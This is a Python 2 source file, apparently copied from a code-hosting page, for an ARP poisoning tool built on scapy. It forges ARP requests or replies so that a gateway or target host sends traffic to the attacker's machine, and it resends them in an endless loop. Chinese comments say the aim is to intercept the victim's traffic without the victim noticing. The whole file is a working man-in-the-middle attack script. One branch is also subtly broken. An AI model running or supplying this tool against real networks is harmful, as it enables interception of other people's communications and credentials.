1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97
|
import sys import os import signal from scapy.all import ( get_if_hwaddr, getmacbyip, ARP, Ether, sendp )
from optparse import OptionParser
def main(): try: if os.getuid() != 0: print "[-]Run me as root" sys.exit(1) except BaseException: print 'Something Error' usage = 'Usage:%prog [-i interface][-t target] host' parser = OptionParser(usage) parser.add_option('-i', dest='interface', help='Specify the interface to use') parser.add_option('-t', dest='target', help='Specify a particular to ARP poison') parser.add_option('-m', dest='mode', default='req', help='Posioning mode:requests(req) or replies(rep) [default:%default]') parser.add_option('-s', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning') (options, args) = parser.parse_args()
if len(args) != 1 or options.interface is None: parser.print_help() sys.exit(0)
mac = get_if_hwaddr(options.interface)
def build_req(): """ 以请求包的方式进行欺骗,目的是欺骗网关,让网关把所有的发给被害主机的数据给为本机发一份,同时被害主机毫无察觉。 """ gateway_mac = getmacbyip(args[0]) if options is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=options.target, hwdst=gateway_mac, pdst=args[0], op=1) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=gateway_mac) / ARP(hwsrc=mac, psrc=options.target, hwdst=gateway_mac, pdst=args[0], op=1) return pkt
def build_rep(): """ 以回应包的形式,只是在欺骗被攻击的主机,网关的mac是我这台主机的mac。 """ if options.target is None: pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], op=2) elif options.target: target_mac = getmacbyip(options.target) if target_mac is None: print "[-] Error: Could not resolve targets MAC address" sys.exit(1) pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target, op=2) return pkt
if options.mode == 'req': pkt = build_req() elif options.mode == 'rep': pkt = build_rep()
if options.summary is True: pkt.show() ans = raw_input('\n[*] Continue? [Y|n]: ').lower() if ans == 'y' or len(ans) == 0: pass else: sys.exit(0) while True: sendp(pkt, inter=2, iface=options.interface)
if __name__ == '__main__': main()
|